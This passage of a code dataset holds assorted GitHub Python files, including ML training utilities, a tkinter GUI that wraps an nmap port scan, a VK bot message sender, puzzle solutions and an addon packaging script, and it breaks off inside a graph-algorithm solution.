model_name\n model_dir = get_full_path(model_dir, task_name, model_file_name)\n\n return model_dir\n\n\ndef get_model_serving_path(task_name, model_name, serving_dir='models'):\n\n serving_path= get_full_path(serving_dir, task_name, model_name )\n\n return serving_path\n\n\ndef get_checkpoint_path(task_name, model_name, model_dir='models'):\n checkpoint_variables = '{epoch:02d}-{val_acc:.2f}'\n save_directory = get_full_path(model_dir, task_name)\n checkpoint_path = f\"{save_directory}/cp-{model_name}-{checkpoint_variables}.ckpt\"\n return checkpoint_path\n\n\ndef get_tensorboard_log_path(task_name,model_dir='models'):\n run_time = datetime.datetime.now().strftime(\"%Y-%m-%d_%H:%M:%S\")\n log_path = get_full_path(model_dir, task_name, \"logs\", run_time)\n return log_path\n\n\ndef generate_batches(nexamples, batch_size):\n \"\"\"generates a list of tuples of starts and ends of size nbatches\n\n Args:\n nexamples(int):\n batch_size(int):\n\n Returns:\n list: a list of tuples with start and end index of each batch\n\n \"\"\"\n\n nbatches = int(np.ceil(nexamples / batch_size))\n batches = []\n for batch in range(nbatches):\n start = batch * batch_size\n end = start + batch_size\n\n if end > nexamples:\n end = nexamples\n\n batches.append((start, end))\n\n return batches\n\n\ndef get_datetime():\n return datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\ndef divisorGenerator(n):\n large_divisors = []\n for i in range(1, int(np.sqrt(n) + 1)):\n if n % i == 0:\n yield i\n if i*i != n:\n large_divisors.append(int(n / i))\n for divisor in reversed(large_divisors):\n yield divisor\n\n\ndef getBatchsize(nexamples, selectedBatchSize, lowerBound = True):\n \"\"\"return the batchsize which is exactly divisible by the number of examples an is closest to the proposed batchsize\n\n Args:\n nexamples(int):\n selectedBatchSize(int):\n lowerBound(bool):\n\n Returns:\n int: a closet divisible batchsize\n\n \"\"\"\n\n divisors = list(divisorGenerator(nexamples))[1:-1]\n\n if len(divisors) == 0:\n if lowerBound==True:\n return 1\n else:\n return nexamples\n\n previousDivisor = divisors[0]\n for divisor in divisors:\n if selectedBatchSize < divisor:\n if lowerBound == True:\n return previousDivisor\n else:\n return divisor\n previousDivisor = divisor\n\n# get_model_path(\"gender_IN_jabong\", \"resnet50\", epoch=10, val_acc=0.93)","repo_name":"mobinalhassan/zalando_fyp","sub_path":"commonutils/snapthat/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15288618854","text":"import setuptools\n\nwith open(\"README.md\", encoding=\"utf8\") as readme_file:\n long_description = readme_file.read()\n\nrequirements = [\"pandas>=0.2\", \"numpy>=1\", \"matplotlib>=3\"]\n\nsetuptools.setup(\n name='confidence_tool',\n version=\"0.0.4\",\n author='Andre Frade',\n py_modules=['confidence_tool.confidence_tool'],\n author_email=\"andre.frade@hertford.ox.ac.uk\",\n description='Confidence tool package for classification models',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/apfrade/ConfidenceMeasure.git\",\n packages=setuptools.find_packages(),\n install_requires= requirements,\n python_requires='>=3',\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n], \n)","repo_name":"apfrade/ConfidenceMeasure","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39278498779","text":"\n# Network manager project by Tijan\n\n\nfrom tkinter import *\nimport time\nfrom PIL import ImageTk,Image\nimport os.path\nfrom os import path\nfrom tkinter import ttk\nimport nmap \n\n\n\nif os.path.exists(\"proj/.transp.ini\") != True:\n with open(\"proj/.transp.ini\", \"w+\"):\n pass\nif os.path.exists(\"proj/ip.ini\") != True:\n with open(\"proj/.ip.ini\", \"w+\"):\n pass\n\n\nroot = Tk()\ntry: \n root.iconbitmap(\"proj/my.ico\")\nexcept Exception:\n pass\nroot.title(\"Network Manager by Tij\")\nroot.geometry('520x428+50+50')\nroot.overrideredirect(False)\nroot.config(bg='white')\nwith open(\"proj/.transp.ini\", 'r') as f:\n nbr = f.read()\nif nbr != \"\":\n root.attributes(\"-alpha\", nbr)\n\ndef step():\n for x in range(100):\n root.update()\n my_progress['value'] += 5\n \n time.sleep(0.01)\nmy_progress = ttk.Progressbar(root, orient=HORIZONTAL, length=200, mode='determinate')\nmy_progress.grid(pady=200, padx=150)\nstep()\nroot.after(0, my_progress.destroy)\n \ndef wait():\n time.sleep(0.05)\ndef dim(t):\n root.attributes(\"-alpha\", t)\n\ndef ferm():\n root.quit()\ndef get():\n s = int(w.get())\n if s == 0:\n with open(\"proj/.transp.ini.\", \"w\") as f:\n f.write('1')\n \n root.attributes(\"-alpha\", 1)\n \n if s == 1:\n with open(\"proj/.transp.ini.\", \"w\") as f:\n f.write('0.97')\n root.attributes(\"-alpha\", 0.97)\n \n if s == 2:\n root.attributes(\"-alpha\", 0.95)\n \n if s == 3:\n root.attributes(\"-alpha\", 0.93)\n \n if s == 4:\n root.attributes(\"-alpha\", 0.90)\n \n if s == 5:\n root.attributes(\"-alpha\", 0.87)\n \n if s == 6:\n root.attributes(\"-alpha\", 0.84)\n \n if s == 7:\n root.attributes(\"-alpha\", 0.81)\n \n if s == 8:\n root.attributes(\"-alpha\", 0.78)\n \n if s == 9:\n root.attributes(\"-alpha\", 0.75)\n \n if s == 10:\n root.attributes(\"-alpha\", 0.73)\n \n\ndef fermer(e):\n \n root.quit()\ndef show(e):\n root.overrideredirect(False)\n\n# f_colors \n\ndef jaune(e):\n root.config(bg='#fff176')\n fr.config(bg='white')\n lbl2.config(bg='#fff176')\n lbl.config(bg='#fff176')\n w.config(bg='#fff176')\ndef rouge(e):\n root.config(bg='#263238')\n lbl2.config(bg='grey')\n lbl.config(bg='grey')\ndef gris(e):\n root.config(bg='grey')\n lbl2.config(bg='grey')\n lbl.config(bg='grey')\n w.config(bg='white')\n\n\n\ndef blanc(e):\n root.config(bg='white')\n lbl2.config(bg='white')\n lbl.config(bg='white')\n w.config(bg='#8bc34a')\n btn_principal.config(bg='#e0e0e0') #4 #buttons = (btn_principal, but1, but_2, but_3, but_4)\n but1.config(bg='#bdbdbd')\n but_2.config(bg='#9e9e9e')\n but_3.config(bg='#757575')\n but_4.config(bg='#616161')\n\n # code\ndef btn_bind(e):\n btn.config(bg='#ef5350')\ndef btn_leave(e):\n btn.config(bg='#f0f4c3')\n#################################\ndef bxes(e):\n lac.config(relief=\"solid\")\ndef bxes_l(e):\n lac.config(relief=\"flat\")\ndef bxes1(e):\n lac3.config(relief=\"solid\")\ndef bxes_l1(e):\n lac3.config(relief=\"flat\")\ndef bxes2(e):\n lac4.config(relief=\"solid\")\ndef bxes_l2(e):\n lac4.config(relief=\"flat\")\ndef show_button():\n frame_principal.grid_forget()\n fr3.grid_forget()\n fr.grid(row=0, column=1)\n root.config(bg=\"#5c6bc0\")\ndef hide():\n \n fr.grid_forget()\n\ndef show2():\n frame_principal.grid_forget()\n fr.grid_forget()\n fr3.grid(row=0, column=1)\n \n\n\ndef overfl(e):\n but1.config(bg=\"#ef5350\")\ndef overfl_leave(e):\n but1.config(bg=\"#5c6bc0\")\ndef overfl2(e):\n but_2.config(bg=\"#ef5350\")\ndef overfl_leave2(e):\n but_2.config(bg=\"#4db6ac\")\ndef overfl3(e):\n but_3.config(bg=\"#ef5350\")\ndef overfl_leave3(e):\n but_3.config(bg=\"#ff8a65\")\ndef overfl4(e):\n but_4.config(bg=\"#ef5350\")\ndef overfl_leave4(e):\n but_4.config(bg=\"#f48fb1\")\n\ndef show_principal(e):\n fr.grid_forget()\n fr3.grid_forget()\n frame_principal.grid(row=0, column=1, sticky='n')\n \ndef bpenter(e):\n btn_principal.config(bg=\"#ef5350\")\ndef bpleave(e):\n btn_principal.config(bg=\"#bdbdbd\")\n\ndef scan():\n with open(\"proj/ip.ini\", 'a') as r:\n r.writelines(e.get())\n text.insert(INSERT, 'Scan en cours...\\n')\n root.update()\n ns = nmap.PortScanner()\n print(ns.nmap_version())\n ns.scan(e.get(),'1-1024','-v')\n print(ns.scaninfo())\n a=ns.csv()\n b=(a.replace(';', ' '))\n text.insert(INSERT, b)\ndef entrer(e):\n scan()\n##################################\n\nfr = Frame(root, bg='white', bd=0)\nfr2 = Frame(root, bg='white', relief=RAISED, bd=0)\nfr2.grid(row=0, column=0, sticky='n')\nfr3 = Frame(root, bg='white', bd=2, relief=RAISED)\n\nlbl = Label(fr, text='transparence : ', bg='white', font=('Helvetica 10 bold'))\nlbl.grid(row=1, column=0, padx=10, pady=10)\n\nw = Spinbox(fr, from_=0, to=10, bg='white', font=('Helvetica 10 bold'))\nw.grid(row=1, column=1, pady=10)\nframe_principal = Frame(root, bg=\"#bdbdbd\")\nframe_principal.grid(column=1, row=0, sticky=\"n\")\n# row length \n\n#fr.grid_rowconfigure(2, weight=0)\n\nbtn = Button(fr, text= 'appliquer', command=lambda:[get()], font=('Helvetica 10 bold'), relief=FLAT)\nbtn.grid(row=1, column=2, padx=10, pady=10)\n\nbq = Button(fr, text=\"Quitter\", font=(\"Helvetica 10 bold\"), relief=FLAT, fg='red', command=lambda:[dim(0.95), wait(), dim(0.90), wait(), dim(0.85), wait(), dim(0.80), wait(), dim(0.75), wait(), dim(0.70), wait(), dim(0.65), wait(), dim(0.60), wait(), dim(0.55), wait(), dim(0.50), wait(), dim(0.45), wait(), dim(0.40), wait(), dim(0.35), wait(), dim(0.30), wait(), dim(0.25), wait(), dim(0.20), wait(), dim(0.15), wait(), dim(0.10), wait(), dim(0.5), wait(), dim(0), ferm()])\nbq.grid(row=4, column=2)\nroot.bind(\"\", show)\n\nlbl2 = Label(fr, text=\"Thémes : \", font=(\"Helvetica 10 bold\"), bg=\"white\")\nlbl2.grid(column=0, row=2, sticky='w', padx=13)\nbtn.bind(\"\", btn_bind)\nbtn.bind(\"\", btn_leave)\n\n#colors####################################\nmyfr = Frame(fr)\nmyfr.grid(column=1, row=2, )\n\nlac = Label(myfr, text=\" \", bg='yellow')\nlac.grid(column=0, row=0, sticky='w', pady=5, padx=5)\n\nlac1 = Label(myfr, text=\" \", bg='#263238')\nlac1.grid(column=1, row=0, sticky='w', pady=5, padx=5)\n\nlac3 = Label(myfr, text=\" \", bg='grey')\nlac3.grid(column=2, row=0, sticky='w', pady=5, padx=5)\n\nlac4 = Label(myfr, text=\" \", bg='white')\nlac4.grid(column=3, row=0, sticky='w', pady=5, padx=5)\n\n##################################################\"\"\nlac.bind(\"\", bxes)\nlac.bind(\"\", bxes_l)\nlac3.bind(\"\", bxes1)\nlac3.bind(\"\", bxes_l1)\nlac4.bind(\"\", bxes2)\nlac4.bind(\"\", bxes_l2)\n\nlac.bind(\"\", jaune)\nlac1.bind(\"\", rouge)\nlac3.bind('', gris)\nlac4.bind('', blanc)\n\n#img = ImageTk.PhotoImage(Image.open(\"C:/Users/Tijan/Desktop/Text-file-to-handwritten-pdf-file-master/Text-file-to-handwritten-pdf-file-master/my3.ico\"))\n#ytb = Label(fr, image=img, height=50, width=50)\n#ytb.grid(row=7, column=0)\nlbb = Label(root, text='cacher')\nbtn_principal = Button(fr2, text=\"General\", font=('Helvetica'), relief=FLAT, bg='#bdbdbd', width=10, height=4)\nbtn_principal.grid(row=0, column=0, sticky='n')\n#butttons\nbut1 = Button(fr2, text=\"🛠\\n Réglages\", command=show_button, font=('Arial'), relief=FLAT, bg='#5c6bc0', height=4, width=10)\nbut1.grid(row=1, column=0, sticky='n')\nbut_2 = Button(fr2, text='🔑', relief=FLAT, font=('Helvetica'), bg='#4db6ac', command=show2, width=10, height=4)\nbut_2.grid(row=2, column=0, sticky='n')\nbut_3 = Button(fr2, text='🔊', relief=FLAT, font=('Helvetica'), bg='#ff8a65', command=show2, width=10, height=4)\nbut_3.grid(row=3, column=0, sticky='n')\nbut_4 = Button(fr2, text='🎲', relief=FLAT, font=('Helvetica'), bg='#f48fb1', command=show2, width=10, height=4)\nbut_4.grid(row=4, column=0, sticky='n')\n\nbtn_principal.bind(\"\", show_principal)\nbtn_principal.bind(\"\", bpenter)\nbtn_principal.bind(\"\", bpleave)\nbut1.bind(\"\", overfl)\nbut1.bind(\"\", overfl_leave)\nbut_2.bind(\"\", overfl2)\nbut_2.bind(\"\", overfl_leave2)\nbut_3.bind(\"\", overfl3)\nbut_3.bind(\"\", overfl_leave3)\nbut_4.bind(\"\", overfl4)\nbut_4.bind(\"\", overfl_leave4)\nl = Label(frame_principal, text=\"Adresse IP : \", font=('Helvetica 10 bold'))\nl.grid(column=0, row=0,sticky='n', pady=10, padx=10)\ne = Entry(frame_principal, width=20, font=(\"Cambria 12 bold\"))\ne.grid(column=1, row=0, sticky='n', pady=10)\nb = Button(frame_principal, text=\"Scanner\", font=('Helvetica 10 bold'), relief=FLAT, command=scan)\nb.grid(row=0, column=2, sticky='n', pady=10, padx=10)\nbutto = Button(frame_principal, text='reduire', command=root.iconify)\n\ntext = Text(frame_principal, height=50, width=53, wrap=WORD, font=('Helvetica 11 bold'), fg='#4caf50', bg='black')\ntext.grid(row=1, column=0, columnspan=4)\ne.bind(\"\", entrer)\n\nroot.mainloop()","repo_name":"Tijan-Infogeeks/Tij-tech","sub_path":"NetworkManager.py","file_name":"NetworkManager.py","file_ext":"py","file_size_in_byte":8948,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"18298798874","text":"\"\"\"\nФункции отвечающие за отправку сообщений\n\"\"\"\nfrom vk_api.utils import get_random_id\nfrom vk_api.upload import VkUpload\nimport vk_api\nfrom time import sleep\nfrom threading import Thread\nimport urllib\nfrom random import choice\nfrom string import ascii_lowercase\nimport os.path\nfrom os import path\nimport requests\nimport re\n\n\ndef _send_message(vk, id, message, sleep_time=5, keyboard=None, attachment=None):\n \"\"\"\n имитирует typing, отправляет сообщение через sleep_time\n Проверяет на блок\n \"\"\"\n try:\n if id > 0:\n vk.messages.setActivity(user_id=id, type=\"typing\")\n if keyboard is None:\n keys = None\n else:\n keys = keyboard.get_keyboard()\n sleep(sleep_time)\n\n vk.messages.send(\n user_id=id,\n random_id=get_random_id(),\n keyboard=keys,\n message=message,\n attachment=attachment\n )\n\n except vk_api.exceptions.ApiError as e:\n print(e)\n\n\ndef load_image(url):\n random_name = \"tmp/\" + ''.join(choice(ascii_lowercase) for i in range(12)) + url[-4:]\n if not path.exists('tmp'):\n os.mkdir('tmp')\n urllib.request.urlretrieve(url, random_name)\n return random_name\n\n\ndef get_flag_url(country):\n result = requests.get('https://geo.koltyrin.ru/country.php?country=' + country)\n s = result.content\n res = re.findall(r'img\\/country\\/\\d+flag\\.png\"\\s+alt=', s.decode(\"utf-8\"))\n res = res[0][0:-6]\n return \"https://geo.koltyrin.ru/\" + res\n\n\ndef get_map_url(country):\n result = requests.get('https://geo.koltyrin.ru/country.php?country=' + country)\n s = result.content\n res = re.findall(r'img\\/country\\/\\d+globe\\.png\"\\s+alt=', s.decode(\"utf-8\"))\n res = res[0][0:-6]\n return \"https://geo.koltyrin.ru/\" + res\n\n\ndef send_message(kwargs):\n \"\"\"\n Обертка для _send_message, выполняется в потоке, не блогирует цикл\n send_message({\"vk\": vk, \"id\": vk_id, \"message\": \"da\", \"sleep_time\": 0, \"keyboard\": None, \"attachment\": None})\n \"\"\"\n Thread(target=_send_message, kwargs=kwargs, name=\"Message sender\").start()\n\n\ndef _send_photo_path(vk, id, text, photo_path, delete=True, keyboard=None):\n upload = VkUpload(vk)\n uploaded = upload.photo_messages(photo_path)\n if path.exists(photo_path) and delete:\n os.remove(photo_path)\n photo = 'photo' + str(uploaded[0]['owner_id']) + '_' + str(uploaded[0]['id'])\n send_message({\"vk\": vk, \"id\": id, \"message\": text, \"sleep_time\": 0, \"attachment\": photo, \"keyboard\": keyboard})\n\ndef _send_photo_paths(vk, id, text, photo_paths, delete=True, keyboard=None):\n upload = VkUpload(vk)\n photo = ''\n for photo_path in photo_paths:\n uploaded = upload.photo_messages(photo_path)\n if path.exists(photo_path) and delete:\n os.remove(photo_path)\n photo = photo+',photo' + str(uploaded[0]['owner_id']) + '_' + str(uploaded[0]['id'])\n send_message({\"vk\": vk, \"id\": id, \"message\": text, \"sleep_time\": 0, \"attachment\": photo[1:], \"keyboard\": keyboard})\n\n\ndef _send_photo_url(vk, id, text, url, delete=True, keyboard=None):\n path = load_image(url)\n send_photo_path(vk, id, text, path, delete, keyboard)\n\ndef _send_photo_urls(vk, id, text, urls, delete=True, keyboard=None):\n paths = []\n for url in urls:\n path = load_image(url)\n paths.append(path)\n send_photo_paths(vk, id, text, paths, delete, keyboard)\n\ndef send_text(vk, id, text, keyboard=None):\n send_message({\"vk\": vk, \"id\": id, \"message\": text, \"sleep_time\": 0, \"keyboard\": keyboard})\n\n\ndef send_photo_path(vk, id, text, path, delete, keyboard=None):\n kwargs = {\"vk\": vk, \"id\": id, \"text\": text, \"photo_path\": path, \"delete\": delete, \"keyboard\": keyboard}\n Thread(target=_send_photo_path, kwargs=kwargs, name=\"Photo path sender\").start()\n\ndef send_photo_paths(vk, id, text, paths, delete, keyboard=None):\n kwargs = {\"vk\": vk, \"id\": id, \"text\": text, \"photo_paths\": paths, \"delete\": delete, \"keyboard\": keyboard}\n Thread(target=_send_photo_paths, kwargs=kwargs, name=\"Photo path sender\").start()\n\ndef send_photo_url(vk, id, text, url, delete, keyboard=None):\n kwargs = {\"vk\": vk, \"id\": id, \"text\": text, \"url\": url, \"delete\": delete, \"keyboard\": keyboard}\n Thread(target=_send_photo_url, kwargs=kwargs, name=\"Photo url sender\").start()\n\ndef send_photo_urls(vk, id, text, urls, delete, keyboard=None):\n kwargs = {\"vk\": vk, \"id\": id, \"text\": text, \"urls\": urls, \"delete\": delete, \"keyboard\": keyboard}\n Thread(target=_send_photo_urls, kwargs=kwargs, name=\"Photo url sender\").start()\n","repo_name":"stepoleggg/geo","sub_path":"message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":4738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38362876573","text":"# Import all required Python frameworks.\nfrom classes.data_preparation import DataPreparation\nfrom classes.encoder import Encoder\nfrom classes.decoder import Decoder\nimport tensorflow as tf\nimport tensorflow_addons as tfa\nfrom tqdm import tqdm\nimport os\nimport numpy\n# I check if i can run the model in GPU for faster training\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' \ntf.config.list_physical_devices(\"GPU\")\nif tf.config.list_physical_devices(\"GPU\"):\n print(\"The model will use the GPU !!!\")\nelse:\n print(\"The model will use the CPU !!!\")\n\nEPOCHS = 4\nSENTENCE_PAIRS = 30000\nBATCH_SIZE = 64\nDATAPATH = \"datasets\"\nDATAFILE = \"fra.txt\"\nEMBEDDING_DIM = 256\nENCODER_DIM, DECODER_DIM = 1024, 1024\nSTEPS_PER_EPOCH = SENTENCE_PAIRS // BATCH_SIZE\noptimizer = tf.keras.optimizers.Adam()\ntrain_accuracy = tf.keras.metrics.Mean(name=\"train_accuracy\")\ntest_accuracy = train_accuracy\ndata_preparation = DataPreparation(DATAPATH, DATAFILE, SENTENCE_PAIRS, BATCH_SIZE)\ntrain_dataset = data_preparation.train_dataset\nexample_input_batch, example_target_batch = next(iter(train_dataset))\nexample_input_batch.shape, example_target_batch.shape\nmax_length_input = example_input_batch.shape[1]\nmax_length_output = example_target_batch.shape[1]\nvocab_inp_size = data_preparation.english_vocabulary_size + 1\nvocab_tar_size = data_preparation.french_vocabulary_size + 1\nencoder = Encoder(vocab_inp_size, EMBEDDING_DIM, ENCODER_DIM, BATCH_SIZE)\n# If we want to run the decoder with LuongAttention mechanism we must add in attention_type the string luong\ndecoder = Decoder(vocab_tar_size, EMBEDDING_DIM, DECODER_DIM, BATCH_SIZE, max_length_input, max_length_output, attention_type=\"bahdanau\")\n\ncheckpoint_path = \"./checkpoints/\"\nckpt = tf.train.Checkpoint(optimizer=optimizer, encoder=encoder, decoder=decoder)\nckpt_manager = tf.train.CheckpointManager(ckpt, checkpoint_path, max_to_keep=5)\n# if a checkpoint exists, restore the latest checkpoint.\nif ckpt_manager.latest_checkpoint:\n ckpt.restore(ckpt_manager.latest_checkpoint)\n print(\"Latest checkpoint restored!!\")\n\n\ndef loss_function(real, pred):\n cross_entropy = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=\"none\")\n loss = cross_entropy(y_true=real, y_pred=pred)\n mask = tf.logical_not(tf.math.equal(real, 0)) # output 0 for y=0 else output 1\n mask = tf.cast(mask, dtype=loss.dtype)\n loss = mask * loss\n loss = tf.reduce_mean(loss)\n return loss\n\n\ndef accuracy_function(real, pred, flag=True):\n accuracies = tf.equal(real, tf.argmax(pred, axis=2, output_type=\"int32\") if flag == True else pred)\n mask = tf.math.logical_not(tf.math.equal(real, 0))\n accuracies = tf.math.logical_and(mask, accuracies)\n accuracies = tf.cast(accuracies, dtype=tf.float32)\n mask = tf.cast(mask, dtype=tf.float32)\n return tf.reduce_sum(accuracies) / tf.reduce_sum(mask)\n\n\n@tf.function\ndef train_step(inp, targ, enc_hidden):\n loss = 0\n with tf.GradientTape() as tape:\n enc_output, enc_h, enc_c = encoder(inp, enc_hidden)\n dec_input = targ[:, :-1] # Ignore EOS token\n real = targ[:, 1:] # ignore BOS token\n # Set the AttentionMechanism object with encoder_outputs\n decoder.attention_mechanism.setup_memory(enc_output)\n # Create AttentionWrapperState as initial_state for decoder\n decoder_initial_state = decoder.build_initial_state(BATCH_SIZE, [enc_h, enc_c], tf.float32)\n pred = decoder(dec_input, decoder_initial_state)\n logits = pred.rnn_output\n loss = loss_function(real, logits)\n variables = encoder.trainable_variables + decoder.trainable_variables\n gradients = tape.gradient(loss, variables)\n optimizer.apply_gradients(zip(gradients, variables))\n train_accuracy(accuracy_function(real, logits, flag=True))\n return loss\n\nprint(f\"==================== TRAINING PROCESS (EPOCHS= {EPOCHS} , NUMBER OF SENTENCES FOR TRAINING = {int(SENTENCE_PAIRS * 0.8)}) ====================\")\nfor epoch in tqdm(range(EPOCHS)):\n enc_hidden = encoder.initialize_hidden_state()\n total_loss = 0\n train_accuracy.reset_states()\n for (batch, (inp, targ)) in enumerate(train_dataset.take(STEPS_PER_EPOCH)):\n batch_loss = train_step(inp, targ, enc_hidden)\n total_loss += batch_loss\n if (epoch + 1) % 5 == 0:\n ckpt_save_path = ckpt_manager.save()\n print(\"Epoch {} Loss {:.4f}\".format(epoch + 1, total_loss / STEPS_PER_EPOCH), f\"Accuracy {train_accuracy.result():.4f}\")\n\n\n\ndef testing_process(en_input):\n inference_batch_size = en_input.shape[0]\n enc_start_state = [tf.zeros((inference_batch_size, ENCODER_DIM)), tf.zeros((inference_batch_size, ENCODER_DIM))]\n enc_out, enc_h, enc_c = encoder(en_input, enc_start_state)\n start_tokens = tf.fill([inference_batch_size], data_preparation.french_tokenizer_word_index[\"BOS\"])\n end_token = data_preparation.french_tokenizer_word_index[\"EOS\"]\n greedy_sampler = tfa.seq2seq.GreedyEmbeddingSampler()\n decoder_instance = tfa.seq2seq.BasicDecoder(cell=decoder.rnn_cell, sampler=greedy_sampler, output_layer=decoder.fc)\n decoder.attention_mechanism.setup_memory(enc_out)\n decoder_initial_state = decoder.build_initial_state(inference_batch_size, [enc_h, enc_c], tf.float32)\n decoder_embedding_matrix = decoder.embedding.variables[0]\n outputs, _, _ = decoder_instance(decoder_embedding_matrix, start_tokens=start_tokens, end_token=end_token, initial_state=decoder_initial_state)\n return outputs.sample_id.numpy()[0]\n\nprint(f\"==================== TEST PROCESS ====================\")\npredicted_list = []\ninput_english = data_preparation.input_tensor_val[:20]\ntarget_fr = numpy.array(data_preparation.target_tensor_val[:20])\nfor en_input in tqdm(input_english, desc=\"TESTING PROCESS !!!\"):\n en_input = numpy.array([en_input])\n r = testing_process(en_input)\n predicted_list.append(r)\npadding_predicted_list = tf.keras.preprocessing.sequence.pad_sequences(predicted_list, padding=\"post\", maxlen=max_length_output)\ntarget_fr = tf.convert_to_tensor(target_fr)\nscore = test_accuracy(accuracy_function(target_fr, padding_predicted_list, flag=False))\ntf.print(f\"TEST ACCURACY : {score:.4f}\")\n","repo_name":"Kontosoros/Deep-Learning","sub_path":"WORD LEVEL MACHINE TRANSLATION/thema_3/word_level_machine_translation_part_3.py","file_name":"word_level_machine_translation_part_3.py","file_ext":"py","file_size_in_byte":6157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26418300107","text":"def recursive_check(num_to_split: int):\r\n num_b = int(get_four_mask(str(num_to_split)))\r\n num_a = num_to_split - num_b\r\n return num_a, num_b\r\n\r\n\r\ndef contains_digit_four(num: int):\r\n for char in str(num):\r\n if char == '4':\r\n return True\r\n return False\r\n\r\n\r\ndef get_four_mask(s: str):\r\n mask = list(s)\r\n for i in range(0, s.__len__()):\r\n if s[i] == '4':\r\n mask[i] = '1'\r\n else:\r\n mask[i] = '0'\r\n return \"\".join(mask)\r\n\r\n\r\nif __name__ == '__main__':\r\n # input() reads a string with a line of input, stripping the ' ' (newline) at the end.\r\n # This is all you need for most Code Jam problems.\r\n n_cases = int(input()) # read a line with a single integer\r\n for i in range(1, n_cases + 1):\r\n target_num = [int(s) for s in input().split(\" \")] # read a list of integers, 2 in this case\r\n num_a, num_b = recursive_check(target_num[0])\r\n print(\"Case #{}: {} {}\".format(i, num_a, num_b))\r\n # check out .format's specification for more formatting options\r\n","repo_name":"juansalmeronmoya/codejam2019","sub_path":"codejam_1.py","file_name":"codejam_1.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26556727572","text":"from functools import reduce\nfrom math import sqrt\nfrom utils import primes_up_to\n\nlim = 51\nrows = [[1]]\n\nfor i in range(lim - 1):\n\tprev = rows[i]\n\tsubseq = []\n\tfor j in range(len(prev) + 1):\n\t\tif j in (0, len(prev)):\n\t\t\tsubseq.append(1)\n\t\telse:\n\t\t\tsubseq.append(prev[j-1] + prev[j])\n\trows.append(subseq)\n\nnums = reduce(lambda x,y: x.union(y), rows, set())\nprimes, pset = primes_up_to(int(sqrt(max(nums))) + 1)\nsqrs = [p**2 for p in primes]\n\nsqrfreesum = 0\n\nfor n in nums:\n\tsqr = False\n\tfor s in sqrs:\n\t\tif n % s == 0:\n\t\t\tsqr = True\n\t\t\tbreak\n\tif not sqr:\n\t\tsqrfreesum += n\n\nprint(sqrfreesum)\n","repo_name":"taylordohmen/ProjectEuler","sub_path":"Euler203.py","file_name":"Euler203.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15419223815","text":"import shutil\nfrom pathlib import Path\n\nInterface = \"100100\"\nInterfaceWrath = \"30401\"\nInterfaceClassic = \"11403\"\nDIPPKG_PATH = Path(\"G:\\Dev\\DBM-VoicePack\\zip-files\")\nADDON_path = Path(\"G:\\Dev\\DBM-VoicePack\")\n\ndef replace_keys(key_to_var, filepath: Path):\n # Opening our text file in read only\n # mode using the open() function\n with open(filepath, 'r') as file:\n # Reading the content of the file\n # using the read() function and storing\n # them in a new variable\n data = file.read()\n\n # Searching and replacing the text\n # using the replace() function\n for key, val in key_to_var.items():\n data = data.replace(key, val)\n\n # Opening our text file in write only\n # mode to write the replaced content\n with open(filepath, 'w') as file:\n\n # Writing the replaced data in our\n # text file\n file.write(data)\n\n # Printing Text replaced\n print(\"Text replaced\")\n\ndef package_addon(addon_name:str, version:str):\n\n key_to_var = {}\n key_to_var[\"INTERFACE_KEY\"] = Interface\n key_to_var[\"INTERFACECLASSIC_KEY\"] = InterfaceWrath\n key_to_var[\"INTERFACEWARTH_KEY\"] = InterfaceClassic\n key_to_var[\"VERSION_KEY\"] = version\n\n src = ADDON_path / addon_name\n dest = DIPPKG_PATH / addon_name / addon_name\n if dest.exists():\n shutil.rmtree(dest)\n shutil.copytree(src, dest)\n\n files = []\n files.append(addon_name+\".toc\")\n files.append(addon_name+\"_Vanilla.toc\")\n files.append(addon_name+\"_Wrath.toc\")\n for file in files:\n toc_file = Path(dest / file)\n replace_keys(key_to_var, toc_file)\n\n zippath = Path( DIPPKG_PATH / (addon_name + \"_multi\" + \"_v\" + version) )\n shutil.make_archive(zippath, 'zip', DIPPKG_PATH / addon_name )\n shutil.rmtree(DIPPKG_PATH / addon_name)\n\npackage_addon(\"DBM-VPEnglishFemale\", \"0.1.2\")\npackage_addon(\"DBM-VPFrenchFemale\", \"0.2.9\")\npackage_addon(\"DBM-VPEnglishMale\", \"0.1.2\")\npackage_addon(\"DBM-VPFrenchMale\", \"0.1.2\")","repo_name":"acharnoz/DBM-VoicePack-FrenchFemale","sub_path":"scripts/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7746036397","text":"from sortedcontainers import SortedDict\nclass Solution:\n def minMalwareSpread(self, graph, initial) -> int:\n '''\n 自行解答,解题思路\n 使用dfs深度遍历算法, 查找图的连通子图,每个子图存在病毒节点将会感染\n 遍历每个子图为一个集合减去感染病毒的集合initial,得到diff:\n 1、len(tree) == len(diff),集合数量不变, 忽略\n 2、len(tree) == len(diff) + 1, 集合数量减少1, 则该子图仅一个病毒节点,\n 移除该节点病毒, 能够减少感染len(tree)数量的节点\n 3、len(tree) > len(diff) + 1, 集合数量减少大于1, 则该子图有多个病毒节点,\n 移除该子图中任一节点病毒后, 对拆除后的子数重新infect方法(dfs)遍历计算感染的数量\n 存储字典,key减少感染的数量, value为移除节点编号\n 最后返回最大key值中的最小编号节点\n 